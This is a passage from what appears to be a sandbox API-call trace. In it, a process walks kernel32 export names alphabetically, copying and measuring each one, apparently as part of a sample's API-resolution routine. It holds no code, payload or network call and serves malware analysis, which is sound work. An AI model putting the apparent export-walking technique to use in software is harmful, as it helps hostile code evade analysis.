lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.440] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.440] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.440] lstrlenA (lpString="BEEP") returned 4 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.440] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.440] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.440] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.440] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.441] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.441] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.441] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.441] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.441] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.441] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.441] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.441] lstrlenA (lpString="CANCELIO") returned 8 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.441] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.441] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.441] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.441] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.441] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.441] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.441] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.441] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.441] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.441] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.441] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.442] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.442] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.442] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.442] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.442] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.442] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.442] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.442] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.442] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.442] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.442] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.442] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.442] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.442] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.442] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.442] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.442] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.442] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.442] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.443] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.443] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.443] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.443] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.443] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.443] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.443] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.443] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.443] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.443] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.443] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.443] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.443] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.443] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.443] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.443] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.443] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.443] lstrlenA (lpString="COPYFILEA") returned 9 [0086.443] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.444] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.444] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.444] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.444] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.444] lstrlenA (lpString="COPYFILEW") returned 9 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.444] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.444] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.444] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.444] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.444] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.444] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.444] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.444] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.444] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.444] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.444] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.444] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.444] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.444] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.445] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.445] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.445] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.445] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.445] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.445] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.445] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.445] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.445] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.445] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.445] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.445] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.445] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.445] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.445] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.445] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.445] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.445] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.445] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.446] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.446] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.446] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.446] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.446] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.446] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.446] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.447] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.447] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.447] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.447] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.447] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.447] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.447] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.447] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.447] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.448] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.448] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.448] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.448] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.448] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.448] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.448] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.448] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.448] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.448] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.448] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.448] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.448] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.448] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.448] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.448] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.448] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.449] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.449] lstrlenA 